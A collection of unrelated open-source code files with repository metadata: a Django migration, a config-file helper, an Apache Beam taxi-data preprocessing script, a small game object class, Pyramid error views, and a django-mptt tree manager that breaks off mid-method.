"bytes": "722"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('studies', '0019_auto_20170723_1738'),
]
operations = [
migrations.AlterModelOptions(
name='study',
options={'ordering': ['name'], 'permissions': (('can_view_study', 'Can View Study'), ('can_create_study', 'Can Create Study'), ('can_edit_study', 'Can Edit Study'), ('can_remove_study', 'Can Remove Study'), ('can_activate_study', 'Can Activate Study'), ('can_deactivate_study', 'Can Deactivate Study'), ('can_pause_study', 'Can Pause Study'), ('can_resume_study', 'Can Resume Study'), ('can_approve_study', 'Can Approve Study'), ('can_submit_study', 'Can Submit Study'), ('can_retract_study', 'Can Retract Study'), ('can_resubmit_study', 'Can Resubmit Study'), ('can_edit_study_permissions', 'Can Edit Study Permissions'), ('can_view_study_permissions', 'Can View Study Permissions'), ('can_view_study_responses', 'Can View Study Responses'), ('can_view_study_video_responses', 'Can View Study Video Responses'), ('can_view_study_demographics', 'Can View Study Demographics'), ('can_archive_study', 'Can Archive Study'))},
),
]
| {
"content_hash": "871460fa71b17292f6c871dd573210bd",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 934,
"avg_line_length": 72.17647058823529,
"alnum_prop": 0.6658516707416463,
"repo_name": "pattisdr/lookit-api",
"id": "5164a3e83284b6088f756f76323f18b5a00c4116",
"size": "1300",
"binary": false,
"copies": "1",
"ref": "refs/heads/feature/read_the_docs",
"path": "studies/migrations/0020_auto_20170725_1654.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "10578"
},
{
"name": "HTML",
"bytes": "181428"
},
{
"name": "Python",
"bytes": "439144"
},
{
"name": "Shell",
"bytes": "1118"
}
],
"symlink_target": ""
} |
"""
Config module
This module defines the class for getting configuration options
:license: MIT, see LICENSE for more details
:copyright: (c) 2016 by NETHINKS GmbH, see AUTORS for more details
"""
import os
import configparser
class AppConfig(object):
def __init__(self, config_file=None):
# get directory name
basedir = os.path.dirname(os.path.abspath(__file__))
self.__filename_input = basedir + "/etc/app-default.conf"
self.__filename_output = basedir + "/output/app-config.conf"
if config_file is not None:
self.__filename_input = config_file
self.__config = configparser.ConfigParser()
self.__config.read(self.__filename_input)
def get_value(self, section_name, key, default_value):
# set default value
output = default_value
# get value from config
try:
output = self.__config.get(section_name, key)
except:
pass
# return value
return output
def get_value_boolean(self, section_name, key):
output = False
try:
output = self.__config.getboolean(section_name, key)
except:
pass
return output
def get_sections(self):
return self.__config.sections()
def get_keys(self, section):
return self.__config.options(section)
def set_value(self, section_name, key, value):
# set value in data structure
try:
self.__config[section_name]
except:
self.__config[section_name] = {}
self.__config[section_name][key] = value
# save configuration file
with open(self.__filename_output, 'w') as configfile:
self.__config.write(configfile)
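# Illustrative usage sketch (not part of the original module). The section
# and key names are hypothetical; note that set_value() writes to
# <module dir>/output/app-config.conf, so that directory must exist.
if __name__ == '__main__':
    config = AppConfig()
    name = config.get_value('general', 'instance_name', 'default-instance')
    print(name)
    config.set_value('general', 'instance_name', 'my-instance')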
| {
"content_hash": "caebb9a87fe3288e680d094faa4e4a35",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 68,
"avg_line_length": 29.366666666666667,
"alnum_prop": 0.6027241770715096,
"repo_name": "NETHINKS/opennms-docker-env",
"id": "1fc005cedf7cacfa0cc4741b62f003760b87b417",
"size": "1762",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/container_generator/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1428"
},
{
"name": "JavaScript",
"bytes": "484"
},
{
"name": "Python",
"bytes": "64686"
},
{
"name": "Shell",
"bytes": "77405"
},
{
"name": "Smarty",
"bytes": "10117"
}
],
"symlink_target": ""
} |
"""Preprocessor applying tf.transform to the chicago_taxi data."""
# pytype: skip-file
from __future__ import absolute_import, division, print_function
import argparse
import os
import tensorflow as tf
import tensorflow_transform as transform
import tensorflow_transform.beam as tft_beam
from tensorflow_transform.coders import example_proto_coder
from tensorflow_transform.tf_metadata import dataset_metadata, dataset_schema
import apache_beam as beam
from apache_beam.io.gcp.bigquery import ReadFromBigQuery
from apache_beam.metrics.metric import MetricsFilter
from apache_beam.testing.load_tests.load_test_metrics_utils import (
MeasureTime, MetricsReader)
from trainer import taxi
def _fill_in_missing(x):
"""Replace missing values in a SparseTensor.
Fills in missing values of `x` with '' or 0, and converts to a dense tensor.
Args:
x: A `SparseTensor` of rank 2. Its dense shape should have size at most 1
in the second dimension.
Returns:
A rank 1 tensor where missing values of `x` have been filled in.
"""
default_value = '' if x.dtype == tf.string else 0
return tf.squeeze(
tf.sparse.to_dense(
tf.SparseTensor(x.indices, x.values, [x.dense_shape[0], 1]),
default_value),
axis=1)
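# Example (not in the original source): for a string column whose rows are
# [['a'], [], ['b']] (a rank-2 SparseTensor with dense shape [3, 1]),
# _fill_in_missing returns the dense rank-1 tensor ['a', '', 'b'];
# numeric features get 0 instead of '' for the missing rows.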
def transform_data(
input_handle,
outfile_prefix,
working_dir,
schema_file,
transform_dir=None,
max_rows=None,
pipeline_args=None,
publish_to_bq=False,
project=None,
metrics_table=None,
metrics_dataset=None):
"""The main tf.transform method which analyzes and transforms data.
Args:
input_handle: BigQuery table name to process specified as DATASET.TABLE or
path to csv file with input data.
outfile_prefix: Filename prefix for emitted transformed examples
working_dir: Directory in which transformed examples and transform function
will be emitted.
schema_file: An file path that contains a text-serialized TensorFlow
metadata schema of the input data.
transform_dir: Directory in which the transform output is located. If
provided, this will load the transform_fn from disk instead of computing
it over the data. Hint: this is useful for transforming eval data.
max_rows: Number of rows to query from BigQuery
pipeline_args: additional DataflowRunner or DirectRunner args passed to the
beam pipeline.
"""
def preprocessing_fn(inputs):
"""tf.transform's callback function for preprocessing inputs.
Args:
inputs: map from feature keys to raw not-yet-transformed features.
Returns:
Map from string feature key to transformed feature operations.
"""
outputs = {}
for key in taxi.DENSE_FLOAT_FEATURE_KEYS:
# Preserve this feature as a dense float, setting nan's to the mean.
outputs[taxi.transformed_name(key)] = transform.scale_to_z_score(
_fill_in_missing(inputs[key]))
for key in taxi.VOCAB_FEATURE_KEYS:
# Build a vocabulary for this feature.
outputs[taxi.transformed_name(
key)] = transform.compute_and_apply_vocabulary(
_fill_in_missing(inputs[key]),
top_k=taxi.VOCAB_SIZE,
num_oov_buckets=taxi.OOV_SIZE)
for key in taxi.BUCKET_FEATURE_KEYS:
outputs[taxi.transformed_name(key)] = transform.bucketize(
_fill_in_missing(inputs[key]), taxi.FEATURE_BUCKET_COUNT)
for key in taxi.CATEGORICAL_FEATURE_KEYS:
outputs[taxi.transformed_name(key)] = _fill_in_missing(inputs[key])
# Was this passenger a big tipper?
taxi_fare = _fill_in_missing(inputs[taxi.FARE_KEY])
tips = _fill_in_missing(inputs[taxi.LABEL_KEY])
outputs[taxi.transformed_name(taxi.LABEL_KEY)] = tf.where(
tf.is_nan(taxi_fare),
tf.cast(tf.zeros_like(taxi_fare), tf.int64),
# Test if the tip was > 20% of the fare.
tf.cast(
tf.greater(tips, tf.multiply(taxi_fare, tf.constant(0.2))),
tf.int64))
return outputs
namespace = metrics_table
metrics_monitor = None
if publish_to_bq:
metrics_monitor = MetricsReader(
publish_to_bq=publish_to_bq,
project_name=project,
bq_table=metrics_table,
bq_dataset=metrics_dataset,
namespace=namespace,
filters=MetricsFilter().with_namespace(namespace))
schema = taxi.read_schema(schema_file)
raw_feature_spec = taxi.get_raw_feature_spec(schema)
raw_schema = dataset_schema.from_feature_spec(raw_feature_spec)
raw_data_metadata = dataset_metadata.DatasetMetadata(raw_schema)
pipeline = beam.Pipeline(argv=pipeline_args)
with tft_beam.Context(temp_dir=working_dir):
query = taxi.make_sql(input_handle, max_rows, for_eval=False)
raw_data = (
pipeline
| 'ReadBigQuery' >> ReadFromBigQuery(
query=query, project=project, use_standard_sql=True)
| 'Measure time: start' >> beam.ParDo(MeasureTime(namespace)))
decode_transform = beam.Map(
taxi.clean_raw_data_dict, raw_feature_spec=raw_feature_spec)
if transform_dir is None:
decoded_data = raw_data | 'DecodeForAnalyze' >> decode_transform
transform_fn = ((decoded_data, raw_data_metadata) |
('Analyze' >> tft_beam.AnalyzeDataset(preprocessing_fn)))
_ = (
transform_fn |
('WriteTransformFn' >> tft_beam.WriteTransformFn(working_dir)))
else:
transform_fn = pipeline | tft_beam.ReadTransformFn(transform_dir)
# Shuffling the data before materialization will improve Training
# effectiveness downstream. Here we shuffle the raw_data (as opposed to
# decoded data) since it has a compact representation.
shuffled_data = raw_data | 'RandomizeData' >> beam.transforms.Reshuffle()
decoded_data = shuffled_data | 'DecodeForTransform' >> decode_transform
(transformed_data,
transformed_metadata) = (((decoded_data, raw_data_metadata), transform_fn)
| 'Transform' >> tft_beam.TransformDataset())
coder = example_proto_coder.ExampleProtoCoder(transformed_metadata.schema)
_ = (
transformed_data
| 'SerializeExamples' >> beam.Map(coder.encode)
| 'Measure time: end' >> beam.ParDo(MeasureTime(namespace))
| 'WriteExamples' >> beam.io.WriteToTFRecord(
os.path.join(working_dir, outfile_prefix), file_name_suffix='.gz'))
result = pipeline.run()
result.wait_until_finish()
if metrics_monitor:
metrics_monitor.publish_metrics(result)
def main():
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument(
'--input',
help=('Input BigQuery table to process specified as: '
'DATASET.TABLE'))
parser.add_argument(
'--schema_file', help='File holding the schema for the input data')
parser.add_argument(
'--output_dir',
help=(
'Directory in which transformed examples and function '
'will be emitted.'))
parser.add_argument(
'--outfile_prefix',
help='Filename prefix for emitted transformed examples')
parser.add_argument(
'--transform_dir',
required=False,
default=None,
help='Directory in which the transform output is located')
parser.add_argument(
'--max_rows',
help='Number of rows to query from BigQuery',
default=None,
type=int)
parser.add_argument(
'--publish_to_big_query',
help='Whether to publish to BQ',
default=None,
type=bool)
parser.add_argument(
'--metrics_dataset', help='BQ dataset', default=None, type=str)
parser.add_argument(
'--metrics_table', help='BQ table', default=None, type=str)
parser.add_argument(
'--metric_reporting_project',
help='BQ table project',
default=None,
type=str)
known_args, pipeline_args = parser.parse_known_args()
transform_data(
input_handle=known_args.input,
outfile_prefix=known_args.outfile_prefix,
working_dir=known_args.output_dir,
schema_file=known_args.schema_file,
transform_dir=known_args.transform_dir,
max_rows=known_args.max_rows,
pipeline_args=pipeline_args,
publish_to_bq=known_args.publish_to_big_query,
metrics_dataset=known_args.metrics_dataset,
metrics_table=known_args.metrics_table,
project=known_args.metric_reporting_project)
if __name__ == '__main__':
main()
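# Example invocation (not part of the original script); the BigQuery table,
# schema file and output locations below are placeholders:
#
#   python preprocess.py \
#       --input my_dataset.taxi_trips \
#       --schema_file schema.pbtxt \
#       --output_dir gs://my-bucket/taxi/train \
#       --outfile_prefix train_transformed \
#       --max_rows 100000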
| {
"content_hash": "2eec2dea7aaa13c459dd8495eb4ad1a1",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 79,
"avg_line_length": 35.024896265560166,
"alnum_prop": 0.6762231963037555,
"repo_name": "iemejia/incubator-beam",
"id": "057cb5863e2f67471094535ef4947780d42f4318",
"size": "9039",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sdks/python/apache_beam/testing/benchmarks/chicago_taxi/preprocess.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Groovy",
"bytes": "22216"
},
{
"name": "Java",
"bytes": "9687045"
},
{
"name": "Protocol Buffer",
"bytes": "1407"
},
{
"name": "Shell",
"bytes": "10104"
}
],
"symlink_target": ""
} |
"""Fichier contenant le type Assiette."""
from .conteneur_nourriture import ConteneurNourriture
class Assiette(ConteneurNourriture):
"""Type d'objet: assiette
"""
nom_type = "assiette"
def __init__(self, cle=""):
"""Constructeur de l'objet"""
ConteneurNourriture.__init__(self, cle)
self.poids_max = 12
| {
"content_hash": "40ae4bf077aa8d14d707dfde3f9501e3",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 53,
"avg_line_length": 22.8125,
"alnum_prop": 0.6054794520547945,
"repo_name": "stormi/tsunami",
"id": "ce724e1b6998c54ad39758f7fa5cda02eff1c282",
"size": "1930",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/primaires/objet/types/assiette.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7188300"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
} |
from pyramid.httpexceptions import HTTPClientError, HTTPInternalServerError
from pyramid.renderers import render_to_response
from pyramid.security import NO_PERMISSION_REQUIRED
def error_view(context, request):
data = {
'exc': context,
}
error_template = '/error.html'
response = render_to_response(error_template, data, request)
response.status_int = context.code
return response
def forbidden_view(context, request):
"""Handle ``403 Forbidden`` responses.
If a user is logged in, a 403 indicates the user doesn't have the
permissions necessary to view the resource. In this case, show an
error page.
If no user is logged in, redirect to the login page (unless signups
are enabled via the ``accounts.allow_signup`` setting, in which case
redirect to the signup page).
NOTE: This usage of 403s is dictated by Pyramid's auth machinery. It
uses 403s to indicate any unauthorized access to a protected resource,
whether by an anonymous/unauthenticated user or by an authenticated user
that doesn't have the appropriate permissions. Generally speaking, we
shouldn't raise 403s ourselves (a 400, 401, or 404 can be used instead,
depending on the circumstances).
"""
return error_view(context, request)
def exc_view(context, request):
"""Convert uncaught exception to ``500 Internal Server Error``.
The built-in ``excview`` tween will catch the exception, then call this
view. Without this view, the exception would propagate up to uWSGI,
which would then return an unhelpful 502 response.
``context`` is the exception.
"""
return error_view(HTTPInternalServerError(str(context)), request)
def includeme(config):
settings = config.registry.settings
config.add_view(
view=error_view,
context=HTTPClientError,
permission=NO_PERMISSION_REQUIRED)
config.add_forbidden_view(forbidden_view)
if not settings.get('debug'):
config.add_view(
view=exc_view,
context=Exception,
permission=NO_PERMISSION_REQUIRED)
| {
"content_hash": "27857982506e8f11247639269fb08aea",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 76,
"avg_line_length": 32.56923076923077,
"alnum_prop": 0.7085498346717053,
"repo_name": "storborg/sidecar",
"id": "5d8848edfddfe7a26eb15a1c1949583f8d810421",
"size": "2117",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sidecar/views/error.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3221"
},
{
"name": "JavaScript",
"bytes": "2881"
},
{
"name": "Python",
"bytes": "25342"
}
],
"symlink_target": ""
} |
"""
A custom manager for working with trees of objects.
"""
from django.db import connection, models, transaction
from django.db.models import F, Max
from django.utils.translation import ugettext as _
try:
from django.db import connections, router
except ImportError:
# multi db support was new in django 1.2
# NOTE we don't support django 1.1 anymore, so this stuff is likely to get removed soon
connections = None
router = None
from mptt.exceptions import InvalidMove
from mptt.utils import _exists
__all__ = ('TreeManager',)
qn = connection.ops.quote_name
COUNT_SUBQUERY = """(
SELECT COUNT(*)
FROM %(rel_table)s
WHERE %(mptt_fk)s = %(mptt_table)s.%(mptt_pk)s
)"""
CUMULATIVE_COUNT_SUBQUERY = """(
SELECT COUNT(*)
FROM %(rel_table)s
WHERE %(mptt_fk)s IN
(
SELECT m2.%(mptt_pk)s
FROM %(mptt_table)s m2
WHERE m2.%(tree_id)s = %(mptt_table)s.%(tree_id)s
AND m2.%(left)s BETWEEN %(mptt_table)s.%(left)s
AND %(mptt_table)s.%(right)s
)
)"""
class TreeManager(models.Manager):
"""
A manager for working with trees of objects.
"""
def init_from_model(self, model, prefix=None):
"""
Sets things up. This would normally be done in contribute_to_class(),
but Django calls that before we've created our extra tree fields on the
model (which we need). So it's done here instead, after field setup.
"""
self.prefix = prefix
# Avoid calling "get_field_by_name()", which populates the related
# model's cache and can cause circular imports in complex projects.
# Instead, find the tree_id field using "get_fields_with_model()".
[tree_field] = [fld for fld in model._meta.get_fields_with_model()
if fld[0].name == self.get_tree_id_attr()]
if tree_field[1]:
# tree_model is the model that contains the tree fields.
# this is usually just the same as model, but not for derived models.
self.tree_model = tree_field[1]
else:
self.tree_model = model
self._base_manager = None
if self.tree_model is not model:
# _base_manager is the treemanager on tree_model
if self.prefix is None:
tree_manager_name = '_tree_manager'
else:
tree_manager_name = '_%s_tree_manager' % self.prefix
self._base_manager = getattr(self.tree_model, tree_manager_name)
def get_parent_attr(self):
return self.model._mptt_meta.get_parent_attr(prefix=self.prefix)
@property
def parent_attr(self):
return self.get_parent_attr()
def get_left_attr(self):
return self.model._mptt_meta.get_left_attr(prefix=self.prefix)
@property
def left_attr(self):
return self.get_left_attr()
def get_right_attr(self):
return self.model._mptt_meta.get_right_attr(prefix=self.prefix)
@property
def right_attr(self):
return self.get_right_attr()
def get_tree_id_attr(self):
return self.model._mptt_meta.get_tree_id_attr(prefix=self.prefix)
@property
def tree_id_attr(self):
return self.get_tree_id_attr()
def get_level_attr(self):
return self.model._mptt_meta.get_level_attr(prefix=self.prefix)
@property
def level_attr(self):
return self.get_level_attr()
def _translate_lookups(self, **lookups):
new_lookups = {}
for k, v in lookups.items():
parts = k.split('__')
new_parts = []
for part in parts:
new_parts.append(getattr(self, '%s_attr' % part, part))
new_lookups['__'.join(new_parts)] = v
return new_lookups
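    # Example (not in the original source): with MPTT's default field names,
    #     self._translate_lookups(left__gte=5, parent__isnull=True)
    # returns
    #     {'lft__gte': 5, 'parent__isnull': True}
    # because 'left' maps to self.left_attr ('lft'), 'parent' maps to
    # self.parent_attr (also 'parent' by default), and lookup suffixes such
    # as 'gte' and 'isnull' pass through unchanged.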
def _mptt_filter(self, qs=None, **filters):
"""
Like self.filter(), but translates name-agnostic filters for MPTT fields.
"""
if self._base_manager:
return self._base_manager._mptt_filter(qs=qs, **filters)
if qs is None:
qs = self.get_query_set()
return qs.filter(**self._translate_lookups(**filters))
def _mptt_update(self, qs=None, **items):
"""
Like self.update(), but translates name-agnostic MPTT fields.
"""
if self._base_manager:
return self._base_manager._mptt_update(qs=qs, **items)
if qs is None:
qs = self.get_query_set()
return qs.update(**self._translate_lookups(**items))
def _get_connection(self, node):
if connections is None:
return connection
else:
return connections[router.db_for_write(node)]
def add_related_count(self, queryset, rel_model, rel_field, count_attr,
cumulative=False):
"""
Adds a related item count to a given ``QuerySet`` using its
``extra`` method, for a ``Model`` class which has a relation to
this ``Manager``'s ``Model`` class.
Arguments:
``rel_model``
A ``Model`` class which has a relation to this `Manager``'s
``Model`` class.
``rel_field``
The name of the field in ``rel_model`` which holds the
relation.
``count_attr``
The name of an attribute which should be added to each item in
this ``QuerySet``, containing a count of how many instances
of ``rel_model`` are related to it through ``rel_field``.
``cumulative``
If ``True``, the count will be for each item and all of its
descendants, otherwise it will be for each item itself.
"""
meta = self.model._meta
if cumulative:
subquery = CUMULATIVE_COUNT_SUBQUERY % {
'rel_table': qn(rel_model._meta.db_table),
'mptt_fk': qn(rel_model._meta.get_field(rel_field).column),
'mptt_table': qn(self.tree_model._meta.db_table),
'mptt_pk': qn(meta.pk.column),
'tree_id': qn(meta.get_field(self.get_tree_id_attr(
)).column),
'left': qn(meta.get_field(self.get_left_attr(
)).column),
'right': qn(meta.get_field(self.get_right_attr(
)).column),
}
else:
subquery = COUNT_SUBQUERY % {
'rel_table': qn(rel_model._meta.db_table),
'mptt_fk': qn(rel_model._meta.get_field(rel_field).column),
'mptt_table': qn(self.tree_model._meta.db_table),
'mptt_pk': qn(meta.pk.column),
}
return queryset.extra(select={count_attr: subquery})
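    # Example (not in the original source): annotating every node with a
    # cumulative count of related items. The Category/Article models and the
    # 'category' foreign key name are hypothetical, and `tree` stands for
    # whatever attribute this manager is attached under.
    #
    #     Category.tree.add_related_count(
    #         Category.objects.all(), Article, 'category',
    #         'article_count', cumulative=True)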
def get_query_set(self):
"""
Returns a ``QuerySet`` which contains all tree items, ordered in
such a way that that root nodes appear in tree id order and
their subtrees appear in depth-first order.
"""
return super(TreeManager, self).get_query_set().order_by(
self.get_tree_id_attr(),
self.get_left_attr())
def insert_node(self, node, target, position='last-child', save=False,
allow_existing_pk=False):
"""
        Sets up the tree state for ``node`` (which has not yet been
        inserted into the database) so it will be positioned relative
        to a given ``target`` node as specified by ``position`` (when
        appropriate) when it is inserted, with any necessary space
        already having been made for it.
A ``target`` of ``None`` indicates that ``node`` should be
the last root node.
If ``save`` is ``True``, ``node``'s ``save()`` method will be
called before it is returned.
NOTE: This is a low-level method; it does NOT respect ``MPTTMeta.order_insertion_by``.
In most cases you should just set the node's parent and let mptt call this during save.
"""
if self._base_manager:
return self._base_manager.insert_node(node, target, position=position, save=save)
if node.pk and not allow_existing_pk and _exists(self.filter(pk=node.pk)):
raise ValueError(_('Cannot insert a node which has already been saved.'))
if target is None:
setattr(node, self.get_left_attr(), 1)
setattr(node, self.get_right_attr(), 2)
setattr(node, self.get_level_attr(), 0)
setattr(node, self.get_tree_id_attr(), self._get_next_tree_id())
setattr(node, self.get_parent_attr(), None)
elif target.is_root_node() and position in ['left', 'right']:
target_tree_id = getattr(target, self.get_tree_id_attr())
if position == 'left':
tree_id = target_tree_id
space_target = target_tree_id - 1
else:
tree_id = target_tree_id + 1
space_target = target_tree_id
self._create_tree_space(space_target, )
setattr(node, self.get_left_attr(), 1)
setattr(node, self.get_right_attr(), 2)
setattr(node, self.get_level_attr(), 0)
setattr(node, self.get_tree_id_attr(), tree_id)
setattr(node, self.get_parent_attr(), None)
else:
setattr(node, self.get_left_attr(), 0)
setattr(node, self.get_level_attr(), 0)
space_target, level, left, parent, right_shift = \
self._calculate_inter_tree_move_values(node, target, position,
)
tree_id = getattr(parent, self.get_tree_id_attr())
self._create_space(2, space_target, tree_id)
setattr(node, self.get_left_attr(), -left)
setattr(node, self.get_right_attr(), -left + 1)
setattr(node, self.get_level_attr(), -level)
setattr(node, self.get_tree_id_attr(), tree_id)
setattr(node, self.get_parent_attr(), parent)
if parent:
self._post_insert_update_cached_parent_right(parent, right_shift,
)
if save:
node.save()
return node
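    # Example (not in the original source): explicitly inserting an unsaved
    # node as the last child of an existing one. The Category model is
    # hypothetical, and `tree` stands for this manager's attribute name;
    # normally you would just set node.parent and save().
    #
    #     node = Category(name='shoes')
    #     Category.tree.insert_node(node, parent_node, 'last-child', save=True)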
def move_node(self, node, target, position='last-child'):
"""
Moves ``node`` relative to a given ``target`` node as specified
by ``position`` (when appropriate), by examining both nodes and
calling the appropriate method to perform the move.
A ``target`` of ``None`` indicates that ``node`` should be
turned into a root node.
Valid values for ``position`` are ``'first-child'``,
``'last-child'``, ``'left'`` or ``'right'``.
``node`` will be modified to reflect its new tree state in the
database.
This method explicitly checks for ``node`` being made a sibling
of a root node, as this is a special case due to our use of tree
ids to order root nodes.
NOTE: This is a low-level method; it does NOT respect ``MPTTMeta.order_insertion_by``.
In most cases you should just move the node yourself by setting node.parent.
"""
if self._base_manager:
return self._base_manager.move_node(node, target,
position=position, )
if target is None:
if node.is_child_node():
self._make_child_root_node(node, )
elif target.is_root_node() and position in ['left', 'right']:
self._make_sibling_of_root_node(node, target, position,)
else:
if node.is_root_node():
self._move_root_node(node, target, position)
else:
self._move_child_node(node, target, position)
transaction.commit_unless_managed()
def root_node(self, tree_id):
"""
Returns the root node of the tree with the given id.
"""
if self._base_manager:
return self._base_manager.root_node(tree_id)
return self._mptt_filter(tree_id=tree_id, parent__isnull=True).get()
def root_nodes(self):
"""
Creates a ``QuerySet`` containing root nodes.
"""
if self._base_manager:
return self._base_manager.root_nodes()
return self._mptt_filter(parent__isnull=True)
def rebuild(self):
"""
Rebuilds whole tree in database using `parent` link.
"""
if self._base_manager:
return self._base_manager.rebuild()
opts = self.model._mptt_meta
qs = self._mptt_filter(parent__isnull=True)
if opts.order_insertion_by:
qs = qs.order_by(*opts.order_insertion_by)
pks = qs.values_list('pk', flat=True)
idx = 0
for pk in pks:
idx += 1
self._rebuild_helper(pk, 1, idx)
def _post_insert_update_cached_parent_right(self, instance, right_shift):
setattr(instance, self.get_right_attr(),
getattr(instance, self.get_right_attr()) + right_shift)
attr = '_%s_cache' % self.get_parent_attr()
if hasattr(instance, attr):
parent = getattr(instance, attr)
if parent:
self._post_insert_update_cached_parent_right(parent, right_shift,
)
def _rebuild_helper(self, pk, left, tree_id, level=0):
opts = self.model._mptt_meta
right = left + 1
qs = self._mptt_filter(parent__pk=pk)
if opts.order_insertion_by:
qs = qs.order_by(*opts.order_insertion_by)
child_ids = qs.values_list('pk', flat=True)
for child_id in child_ids:
right = self._rebuild_helper(child_id, right, tree_id, level + 1)
qs = self.model._default_manager.filter(pk=pk)
self._mptt_update(qs,
left=left,
right=right,
level=level,
tree_id=tree_id
)
return right + 1
def _calculate_inter_tree_move_values(self, node, target, position):
"""
Calculates values required when moving ``node`` relative to
``target`` as specified by ``position``.
"""
left = getattr(node, self.get_left_attr())
level = getattr(node, self.get_level_attr())
target_left = getattr(target, self.get_left_attr())
target_right = getattr(target, self.get_right_attr())
target_level = getattr(target, self.get_level_attr())
if position == 'last-child' or position == 'first-child':
if position == 'last-child':
space_target = target_right - 1
else:
space_target = target_left
level_change = level - target_level - 1
parent = target
elif position == 'left' or position == 'right':
if position == 'left':
space_target = target_left - 1
else:
space_target = target_right
level_change = level - target_level
parent = getattr(target, self.get_parent_attr())
else:
raise ValueError(_('An invalid position was given: %s.') % position)
left_right_change = left - space_target - 1
right_shift = 0
if parent:
right_shift = 2 * (node.get_descendant_count() + 1)
return space_target, level_change, left_right_change, parent, right_shift
def _close_gap(self, size, target, tree_id):
"""
Closes a gap of a certain ``size`` after the given ``target``
point in the tree identified by ``tree_id``.
"""
self._manage_space(-size, target, tree_id, )
def _create_space(self, size, target, tree_id):
"""
Creates a space of a certain ``size`` after the given ``target``
point in the tree identified by ``tree_id``.
"""
self._manage_space(size, target, tree_id, )
def _create_tree_space(self, target_tree_id):
"""
Creates space for a new tree by incrementing all tree ids
greater than ``target_tree_id``.
"""
qs = self._mptt_filter(tree_id__gt=target_tree_id)
self._mptt_update(qs, tree_id=F(self.get_tree_id_attr()) + 1)
def _get_next_tree_id(self):
"""
Determines the next largest unused tree id for the tree managed
by this manager.
"""
qs = self.get_query_set()
max_tree_id = qs.aggregate(Max(self.get_tree_id_attr())).values()[0]
max_tree_id = max_tree_id or 0
return max_tree_id + 1
def _inter_tree_move_and_close_gap(self, node, level_change,
left_right_change, new_tree_id,
parent_pk=None):
"""
Removes ``node`` from its current tree, with the given set of
changes being applied to ``node`` and its descendants, closing
the gap left by moving ``node`` as it does so.
If ``parent_pk`` is ``None``, this indicates that ``node`` is
being moved to a brand new tree as its root node, and will thus
have its parent field set to ``NULL``. Otherwise, ``node`` will
have ``parent_pk`` set for its parent field.
"""
opts = self.model._meta
inter_tree_move_query = """
UPDATE %(table)s
SET %(level)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(level)s - %%s
ELSE %(level)s END,
%(tree_id)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %%s
ELSE %(tree_id)s END,
%(left)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(left)s - %%s
WHEN %(left)s > %%s
THEN %(left)s - %%s
ELSE %(left)s END,
%(right)s = CASE
WHEN %(right)s >= %%s AND %(right)s <= %%s
THEN %(right)s - %%s
WHEN %(right)s > %%s
THEN %(right)s - %%s
ELSE %(right)s END,
%(parent)s = CASE
WHEN %(pk)s = %%s
THEN %(new_parent)s
ELSE %(parent)s END
WHERE %(tree_id)s = %%s""" % {
'table': qn(self.tree_model._meta.db_table),
'level': qn(opts.get_field(self.get_level_attr()).column),
'left': qn(opts.get_field(self.get_left_attr()).column),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
'right': qn(opts.get_field(self.get_right_attr()).column),
'parent': qn(opts.get_field(self.get_parent_attr()).column),
'pk': qn(opts.pk.column),
'new_parent': parent_pk is None and 'NULL' or '%s',
}
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
gap_size = right - left + 1
gap_target_left = left - 1
params = [
left, right, level_change,
left, right, new_tree_id,
left, right, left_right_change,
gap_target_left, gap_size,
left, right, left_right_change,
gap_target_left, gap_size,
node.pk,
getattr(node, self.get_tree_id_attr())
]
if parent_pk is not None:
params.insert(-1, parent_pk)
cursor = self._get_connection(node).cursor()
cursor.execute(inter_tree_move_query, params)
def _make_child_root_node(self, node, new_tree_id=None):
"""
Removes ``node`` from its tree, making it the root node of a new
tree.
If ``new_tree_id`` is not specified a new tree id will be
generated.
``node`` will be modified to reflect its new tree state in the
database.
"""
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
level = getattr(node, self.get_level_attr())
if not new_tree_id:
new_tree_id = self._get_next_tree_id()
left_right_change = left - 1
self._inter_tree_move_and_close_gap(node, level, left_right_change,
new_tree_id, )
# Update the node to be consistent with the updated
# tree in the database.
setattr(node, self.get_left_attr(), left - left_right_change)
setattr(node, self.get_right_attr(), right - left_right_change)
setattr(node, self.get_level_attr(), 0)
setattr(node, self.get_tree_id_attr(), new_tree_id)
setattr(node, self.get_parent_attr(), None)
node._mptt_cached_fields[self.get_parent_attr()] = None
def _make_sibling_of_root_node(self, node, target, position):
"""
Moves ``node``, making it a sibling of the given ``target`` root
node as specified by ``position``.
``node`` will be modified to reflect its new tree state in the
database.
Since we use tree ids to reduce the number of rows affected by
        tree management during insertion and deletion, root nodes are not
true siblings; thus, making an item a sibling of a root node is
a special case which involves shuffling tree ids around.
"""
if node == target:
raise InvalidMove(_('A node may not be made a sibling of itself.'))
opts = self.model._meta
tree_id = getattr(node, self.get_tree_id_attr())
target_tree_id = getattr(target, self.get_tree_id_attr())
if node.is_child_node():
if position == 'left':
space_target = target_tree_id - 1
new_tree_id = target_tree_id
elif position == 'right':
